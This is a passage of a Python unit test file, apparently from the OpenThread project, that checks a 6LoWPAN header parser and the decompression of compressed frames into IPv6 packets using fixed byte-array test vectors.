doublemis1/openthread
|
2bb72299d3d91109247001116a1e15a3bbbf8f68
|
[
"BSD-3-Clause"
] | 1
|
2016-07-05T14:44:21.000Z
|
2016-07-05T14:44:21.000Z
|
#!/usr/bin/env python3
#
# Copyright (c) 2016, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
import io
import random
import struct
import unittest
import common
import config
import ipv6
import lowpan
def create_default_lowpan_parser(context_manager):
return lowpan.LowpanParser(
lowpan_mesh_header_factory=lowpan.LowpanMeshHeaderFactory(),
lowpan_decompressor=config.create_default_lowpan_decompressor(
context_manager),
lowpan_fragements_buffers_manager=lowpan.LowpanFragmentsBuffersManager(
),
ipv6_packet_factory=ipv6.IPv6PacketFactory(
ehf=config.create_default_ipv6_extension_headers_factories(),
ulpf={
17:
ipv6.UDPDatagramFactory(
udp_header_factory=ipv6.UDPHeaderFactory(),
udp_payload_factory=ipv6.BytesPayloadFactory()),
58:
ipv6.ICMPv6Factory(
body_factories=config.
create_default_ipv6_icmp_body_factories())
}))
def any_tf():
return random.getrandbits(2)
def any_nh():
return random.getrandbits(1)
def any_hlim():
return random.getrandbits(2)
def any_cid():
return random.getrandbits(1)
def any_sac():
return random.getrandbits(1)
def any_sam():
return random.getrandbits(2)
def any_m():
return random.getrandbits(1)
def any_dac():
return random.getrandbits(1)
def any_dam():
return random.getrandbits(2)
def any_ecn():
return random.getrandbits(2)
def any_dscp():
return random.getrandbits(6)
def any_flow_label():
return random.getrandbits(6)
def any_hop_limit():
return random.getrandbits(8)
def any_src_addr():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_dst_addr():
return bytearray([random.getrandbits(8) for _ in range(16)])
def any_eui64():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_rloc16():
return bytearray([random.getrandbits(8) for _ in range(2)])
def any_48bits_addr():
return bytearray([random.getrandbits(8) for _ in range(6)])
def any_32bits_addr():
return bytearray([random.getrandbits(8) for _ in range(4)])
def any_8bits_addr():
return bytearray([random.getrandbits(8)])
def any_c():
return random.getrandbits(1)
def any_p():
return random.getrandbits(2)
def any_src_port():
return random.getrandbits(16)
def any_dst_port():
return random.getrandbits(16)
def any_compressable_src_port():
return 0xf000 + random.getrandbits(8)
def any_compressable_dst_port():
return 0xf000 + random.getrandbits(8)
def any_nibble_src_port():
return 0xf0b0 + random.getrandbits(4)
def any_nibble_dst_port():
return 0xf0b0 + random.getrandbits(4)
def any_checksum():
return random.getrandbits(16)
def any_next_header():
return random.getrandbits(8)
def any_sci():
return random.getrandbits(4)
def any_dci():
return random.getrandbits(4)
def any_src_mac_addr():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_dst_mac_addr():
return bytearray([random.getrandbits(8) for _ in range(8)])
def any_context():
prefix = bytearray(
[random.getrandbits(8) for _ in range(random.randint(2, 15))])
prefix_length = len(prefix)
return lowpan.Context(prefix, prefix_length * 8)
def any_mac_address():
length = random.choice([2, 8])
if length == 2:
return common.MacAddress.from_rloc16(
bytearray([random.getrandbits(8) for _ in range(length)]))
elif length == 8:
return common.MacAddress.from_eui64(
bytearray([random.getrandbits(8) for _ in range(length)]))
def any_hops_left():
return random.getrandbits(8)
def any_data(length=None):
length = length if length is not None else random.randint(1, 64)
return bytearray([random.getrandbits(8) for _ in range(length)])
def any_datagram_size():
return random.getrandbits(11)
def any_datagram_tag():
return random.getrandbits(16)
def any_datagram_offset():
return random.getrandbits(8)
class TestLowpanIPHC(unittest.TestCase):
def test_should_create_LowpanIPHC_object_when_from_bytes_classmethod_called(
self):
# GIVEN
tf = any_tf()
nh = any_nh()
hlim = any_hlim()
cid = any_cid()
sac = any_sac()
sam = any_sam()
m = any_m()
dac = any_dac()
dam = any_dam()
byte0 = (3 << 5) | (tf << 3) | (nh << 2) | hlim
byte1 = (cid << 7) | (sac << 6) | (sam << 4) | (m << 3) | (
dac << 2) | dam
data_bytes = bytearray([byte0, byte1])
# WHEN
actual = lowpan.LowpanIPHC.from_bytes(data_bytes)
# THEN
self.assertEqual(tf, actual.tf)
self.assertEqual(nh, actual.nh)
self.assertEqual(hlim, actual.hlim)
self.assertEqual(cid, actual.cid)
self.assertEqual(sac, actual.sac)
self.assertEqual(sam, actual.sam)
self.assertEqual(m, actual.m)
self.assertEqual(dac, actual.dac)
self.assertEqual(dam, actual.dam)
class TestLowpanParser(unittest.TestCase):
def test_should_parse_6lo_with_mesh_hdr_that_contains_hlim_stored_on_2_bytes_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0xbf, 0x13, 0x90, 0x00, 0x48, 0x01, 0x7c, 0x77, 0x3f, 0xf2, 0xbf,
0xc0, 0x00, 0x24, 0xb1, 0x62, 0x44, 0x02, 0xf0, 0xba, 0x0d, 0xff,
0x04, 0x01, 0x00, 0x02, 0x02, 0x08, 0x00, 0x07, 0x09, 0x50, 0x20,
0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x21, 0x11, 0x3f, 0xfd, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xff, 0xfe, 0x00,
0x90, 0x00, 0xfd, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xff, 0xfe, 0x00, 0x48, 0x01, 0xf0, 0xbf, 0xc0, 0x00,
0x00, 0x21, 0xe2, 0xdd, 0x62, 0x44, 0x02, 0xf0, 0xba, 0x0d, 0xff,
0x04, 0x01, 0x00, 0x02, 0x02, 0x08, 0x00, 0x07, 0x09, 0x50, 0x20,
0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[0] = lowpan.Context(prefix="fd00:db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_without_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0x33, 0x11, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf, 0x63,
0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb,
0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x14, 0x11, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x16, 0x33, 0x16, 0x34,
0x00, 0x14, 0xcf, 0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_udp_and_without_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xf0, 0x16, 0x33, 0x16, 0x34, 0x04, 0xd2, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x14, 0x11, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x16, 0x33, 0x16, 0x34,
0x00, 0x14, 0xcf, 0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_with_uncompressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0x33, 0x00, 0x11, 0x00, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18,
0x16, 0x33, 0x16, 0x34, 0x00, 0x0c, 0x04, 0xd2, 0x80, 0x00, 0xfa,
0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_uncompressed_udp_and_with_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xe0, 0x11, 0x06, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18,
0x16, 0x33, 0x16, 0x34, 0x00, 0x0c, 0x04, 0xd2, 0x80, 0x00, 0xfa,
0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_udp_and_with_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7e, 0x33, 0xe1, 0x06, 0x6d, 0x04, 0x40, 0x02, 0x00, 0x18, 0xf0,
0x16, 0x33, 0x16, 0x34, 0x04, 0xd2, 0x80, 0x00, 0xfa, 0xa5, 0x0b,
0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x1c, 0x00, 0x40, 0xfe, 0x80, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0xfe, 0x80, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17, 0x11, 0x00, 0x6d, 0x04,
0x40, 0x02, 0x00, 0x18, 0x16, 0x33, 0x16, 0x34, 0x00, 0x14, 0xcf,
0x63, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
parser = create_default_lowpan_parser(context_manager=None)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_1(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_2(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xa0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00,
0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xb3, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_3(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd5, 0xaa, 0x3a, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11,
0x01, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x01, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_4(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf5, 0xaa, 0x3a, 0x36, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff,
0x18, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92,
0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x00, 0x0d, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x36,
0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x18, 0x80, 0x00, 0x97, 0xf4,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_5(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf7, 0xac, 0x3a, 0x80, 0x00, 0xfa, 0xa5, 0x0b, 0xc0, 0x00,
0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x00, 0x0d,
0xb8, 0x00, 0x00, 0x00, 0x00, 0x02, 0x99, 0x99, 0xff, 0xfe, 0x22,
0x11, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xb3, 0xf3,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[10] = lowpan.Context(prefix="2000:0db8::/64")
context_manager[12] = lowpan.Context(
prefix="200d:1456:1255:0000:2514:46ff:fedd:2afe/128")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_6(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xf0, 0xc0, 0x3a, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x54, 0x00,
0x00, 0x12, 0x54, 0x11, 0xff, 0xfe, 0x1c, 0x7e, 0xff, 0x80, 0x00,
0xfa, 0xa5, 0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0x20, 0x0d, 0x14,
0x56, 0x12, 0x55, 0x00, 0x00, 0x25, 0x14, 0x46, 0xff, 0xfe, 0xdd,
0x2a, 0xfe, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x54, 0x00, 0x00, 0x12,
0x54, 0x11, 0xff, 0xfe, 0x1c, 0x7e, 0xff, 0x80, 0x00, 0xa5, 0x40,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[12] = lowpan.Context(
prefix="200d:1456:1255:0000:2514:46ff:fedd:2afe/128")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_7(
self):
# GIVEN
lowpan_packet = bytearray([
0x7a, 0xd0, 0xd0, 0x3a, 0x00, 0x02, 0x98, 0xff, 0xfe, 0x22, 0x12,
0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25, 0x14,
0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xfa, 0xa5, 0x0b,
0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
ipv6_packet = bytearray([
0x60, 0x00, 0x00, 0x00, 0x00, 0x0c, 0x3a, 0x40, 0xaa, 0xbb, 0xcc,
0xdd, 0x00, 0x00, 0x00, 0x00, 0x77, 0x82, 0x98, 0xff, 0xfe, 0x22,
0x12, 0x00, 0x20, 0x0d, 0x14, 0x56, 0x12, 0x55, 0x00, 0x00, 0x25,
0x14, 0x46, 0xff, 0xfe, 0xdd, 0x2a, 0xfe, 0x80, 0x00, 0xf5, 0x28,
0x0b, 0xc0, 0x00, 0x04, 0x4e, 0x92, 0xbb, 0x53
])
message_info = common.MessageInfo()
message_info.source_mac_address = common.MacAddress.from_eui64(
bytearray([0x00, 0x99, 0x99, 0xff, 0xfe, 0x22, 0x11, 0x00]))
message_info.destination_mac_address = common.MacAddress.from_eui64(
bytearray([0x34, 0x29, 0x96, 0xff, 0xfe, 0xac, 0xff, 0x17]))
context_manager = lowpan.ContextManager()
context_manager[13] = lowpan.Context(
prefix="AABB:CCDD:0000:0000:7796::/75")
parser = create_default_lowpan_parser(context_manager)
# WHEN
actual_ipv6_packet = parser.parse(io.BytesIO(lowpan_packet),
message_info)
# THEN
self.assertEqual(ipv6_packet, actual_ipv6_packet.to_bytes())
def test_should_parse_6lo_with_compressed_icmp_and_without_compressed_hbh_when_decompress_method_called_8(
self):
# GIVEN
lowpan_packet = bytearray([
